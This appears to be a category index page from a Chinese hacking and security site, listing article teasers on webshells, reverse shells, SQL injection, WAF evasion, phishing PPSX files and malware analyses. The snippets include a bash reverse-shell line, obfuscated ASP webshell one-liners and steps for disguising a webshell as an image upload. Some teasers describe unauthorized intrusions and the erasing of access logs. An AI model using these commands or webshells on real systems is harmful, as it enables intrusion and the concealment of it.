欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 字幕攻击技术细节
  • 前言 最近CheckPoint公司的研究人员对一种全新的攻击方式——字幕攻击,进行了一个全面研究。其实说起字幕攻击,研究人员嘶吼编辑组曾在今年5月进行过相关的跟踪研究,并对攻击者如何使用字幕文件来控制用......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • 方法虽老但依然有效:如何使用ZIP bomb来保护网站
  • 我不知道你是否自己运营过一个网站或当过某个服务器的管理员,但如果你做过的话,你就会非常清楚地知道外面有多少坏人随时都在想着如何攻击你的网站或服务器。 想当初我还是十三岁的时候我就自己架设了我第一台服务......
  • 所属分类:网站安全 更新时间:2017-07-11 相关标签: 阅读全文...
  • webshell后门上传流程
  • 1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。 2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有......
  • 所属分类:网站安全 更新时间:2017-07-10 相关标签: 阅读全文...
  • VSFTPD v2.3.4后门分析
  • 作者:k0shl 转载请注明出处:http://whereisk0shl.top 这个漏洞和二进制漏洞关系不大,是一个后门分析,这个vsftpd的版本在网上比较难找,还是去google搜一下吧.. 漏洞说明 PoC: #!/usr/bin/python #coding:u......
  • 所属分类:网站安全 更新时间:2017-07-09 相关标签: 阅读全文...
  • 研究人员利用旁路攻击窃取加密信息
  • 过去几年发现的针对 SSL/TLS 的攻击通常需要攻击者处于中间人的位置,也就是要求中间人攻击者能嗅探或操控流量。两位安全研究人员在 Black Hat 安全会议上报告了一种新的组合旁路攻击的方法,不需要中间人去嗅探流量......
  • 所属分类:网站安全 更新时间:2017-07-08 相关标签: 阅读全文...
  • 花无涯带你走进黑客世界之 注入攻击 (上)
  • SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶......
  • 所属分类:网站安全 更新时间:2017-07-06 相关标签: 阅读全文...
  • 化无为有的漏洞挖掘-刷钱漏洞是这样的~
  • 前言: 很久没给知乎的粉丝发干货了,因为知乎的密码找了半天才找回来,很是曲折~希望大家谅解。 其实很早的时候就想研究这个HTTP线程并发测试了,但是一直在做其他的事情就给耽搁了。 一个坑: 为什么我要......
  • 所属分类:网站安全 更新时间:2017-07-02 相关标签: 阅读全文...
  • web安全之如何全面发现系统后台
  • 前言 所谓的网站后台管理系统主要是用于对网站前台的信息管理,如文字、图片、影音、和其他日常使用文件的发布、更新、删除等操作,同时也包括会员信息、订单信息、访客信息的统计和管理等相关操作。简单来说就是对......
  • 所属分类:网站安全 更新时间:2017-07-02 相关标签: 阅读全文...
  • Tomcat访问日志删不掉,怎么办
  • 现在遇到一个很尴尬的问题,shell有administrator权限,但是Tomcat运行着的话就删不了访问日志,就算是以前的也删不了,不知道这Tomcat用了什么黑科技,然后现在我也不能关Tomcat,一关的话网管就发现了,而且我shel......
  • 所属分类:网站安全 更新时间:2017-06-30 相关标签: 阅读全文...
  • 渗透测试 Node.js 应用
  • 在本文中我们将介绍,在渗透中遇到 Node.js 应用如何处理,以及常见的一些 Node.js 的漏洞。 ி 介绍 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境。Node.js 使用了一个事件驱动、非阻塞式 I/O ......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 渗透测试之反弹shell命令分析
  • 我们在对linux主机进行渗透测试的时候,经常回用到反弹shell,之前也没好好去研究、理解具体都是干什么的,就只知道会用…(so low…-.-) 最基本的反弹shell的代码如下: bash -i >& /dev/tcp/192.168.1.1/8080 ......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 对某网站的一次简单渗透测试
  • 此文纯属虚构,纯属娱乐,内容较小白,大牛飘过。 今天心血来潮想拿学校主站的源码看看。 今天阳光明媚,帮我以前学校再做次安全测试。 曾经测试过,主站是动易CMS2006,网上没有公开的漏洞。 中间件是IIS7.5,......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 对某CMS的一次简单渗透测试
  • 好久没有更新博客了,这几天在研究mysql注入,想弄个luanmap玩玩。 写了下mysql的报错注入和union注入,顺便拿公司内网的一个系统测试了下,唯一欠缺的地方就是没有用substr截取结果,有时候报错注入的结果显示长......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 渗透测试小技巧之过waf木马
  • 在研究webshell查杀的时候,学习别人怎么绕waf的思路,今天发现一个很6的函数(至少之前我是没见过),然后结合之前写访问日志记录文件时用到的方法,very perfect! Once step 普通一句话木马: <?php eval($_PO......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 渗透测试时,如何从Linux拓展到AD域?
  • 适用于SAMBA3的方法 通过阅读SAMBA文档可以了解到通过阅读secrets.tdb数据库就可以得到机器账户的明文密码。 现在,我们使用的是旧版本的linux环境,并且已经加入到了域中,主机名为:ubuntu3.如图: 观察上图可......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • ”安全线“大型目标渗透-01信息搜集
  • (安全线)大型目标渗透-01入侵信息搜集 菲哥哥(安全线) 安全线知乎 :https://www.zhihu.com/people/sui-mr/pins/posts 安全线学习群qq:338552043 在入侵渗透一个大型目标网络时我一般分为4个大步骤,信息......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 强大的内网域渗透提权分析工具——BloodHound
  • 简介和背景 在今年二月,我发布了一个名为“ PowerPath ” 的POC脚本,它整合了Will Schroeder的 PowerView 和Justin Warner的 本地管理员衍生工具 ,图形理论以及Jim Truher( @jwtruher )为证明可以自动执行Act......
  • 所属分类:网站安全 更新时间:2017-06-22 相关标签: 阅读全文...
  • 构造PPSX钓鱼文件
  • 之前出现了一种新型的钓鱼攻击的手法,即通过PPT在未开启宏的情况下,执行程序,关于这个Freebuf也有相关文章进行介绍, 《新型PPT钓鱼攻击分析》 , 《无需宏,PPT也能用来投递恶意程序》 。但是文中都未介绍怎么制......
  • 所属分类:网站安全 更新时间:2017-06-22 相关标签: 阅读全文...
  • AppDomainManager后门的实现思路
  • 0x00 前言 从Casey Smith@subTee学到的一个技巧:针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。 如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被......
  • 所属分类:网站安全 更新时间:2017-06-22 相关标签: 阅读全文...
  • 大神实战入侵王者荣耀钓鱼网站
  • 那是一个阳光明媚的中午,我躺在寝室掏出手机,打开了王者荣耀准备开撸。。。。突然。。看到一条消息。。。让我百度上找全服备战宝箱。。送荆轲,当时。。。。。我熟练的打开uc浏览器:)不是广告。。然后开始了。各位......
  • 所属分类:网站安全 更新时间:2017-06-20 相关标签: 阅读全文...
  • 一句话木马(webshell)是如何执行命令的
  • 在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的......
  • 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
  • 记一波搞事日记(小小思路日常笔记)
  • 6.1安全法出台 各位不要乱搞事情很危险 一.确定目标网站 (**县一中)二.确定进入目的(相信看过我帖子的小伙伴都知道 就是为了点学生照片而已)三.确定进入思路百度搜索了 **县一中网址http://www.**yz.net/ 各位大佬勿......
  • 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
  • 过狗版php一句话
  • 几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 这个是90sec发的 1 <%eval""......
  • 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
  • SambaCry真的来了,利用CVE-2017-7494漏洞来挖矿
  • 两周前我们曾经预警过一个Samba远程代码执行漏洞,这款漏洞能够影响影响7年前的Samba版本,黑客可以利用漏洞进行远程代码执行。更多漏洞原理及利用细节可以参考我们之前的报道。 由于具备与永恒之蓝相似的传播性,大......
  • 所属分类:网站安全 更新时间:2017-06-13 相关标签: 阅读全文...
  • 暗云Ⅲ危害——不仅仅是DDoS
  • 0×00概况 前面对暗云的分析报告中,腾讯电脑管家 安全团队 基本摸清暗云Ⅲ的感染方式和传播方式,也定位到被感染暗云Ⅲ的机器会在启动时从服务端下载任务脚本包——ndn.db文件,且该文件会常进行更换。此......
  • 所属分类:网站安全 更新时间:2017-06-13 相关标签: 阅读全文...
  • 如何通过 SSH 隧道进行域渗透的 PtT 攻击
  • 前言 如果我们在渗透过程中能够拿到用户的 TGT,并能将其导入到内存,那么就可以冒充该用户获得其访问权限,这就是 Pass the ticket(PtT)。PtT 技术使用 Kerberos ticket 来代替明文密码或 NTLM 散列。大多数......
  • 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
  • 深度追踪WannaCry源头轶事
  • 注1:基于隐私问题,本文中隐去黑客相关信息,如有关部门需要,请与腾讯反病毒实验室联系。 注2 : 自WannaCry爆发以来,腾讯反病毒实验室一直在深入跟进整体传播态势,通过各种渠道,汇集各类信息 , 努力深挖敲诈......
  • 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
  • 论二级域名收集的各种姿势
  • 测试dns域传送 测试方式如图: 当然,这种方式不一定都能成功,但也不失为一种获取二级域名的方式。 反查whois 工具:站长工具 1 查询whois http://whois.chinaz.com/baidu.com 2 反查whois http://whois.......
  • 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
  • 安全小故事之“你不仁,我不义”
  • 最近某互联网公司的员工小刘很是郁闷,因为自己的粗心,与客户签订的合同价格少写了一个0,造成了公司的巨大损失,经公司高层讨论决定开除小刘。但是小刘认为自己的合同是经领导检查通过,不应该由自己负全部责任,......
  • 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
  • 服务端注入之Flask框架中服务端模板注入问题
  • Flask 是python语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架 具体详见 http://docs.jinkan.org/docs/flask/ 对于Flask 框架本身,本文不做讨论。 本文主要通过几个例子,测试说明下Flask框架中服务......
  • 所属分类:网站安全 更新时间:2017-06-05 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集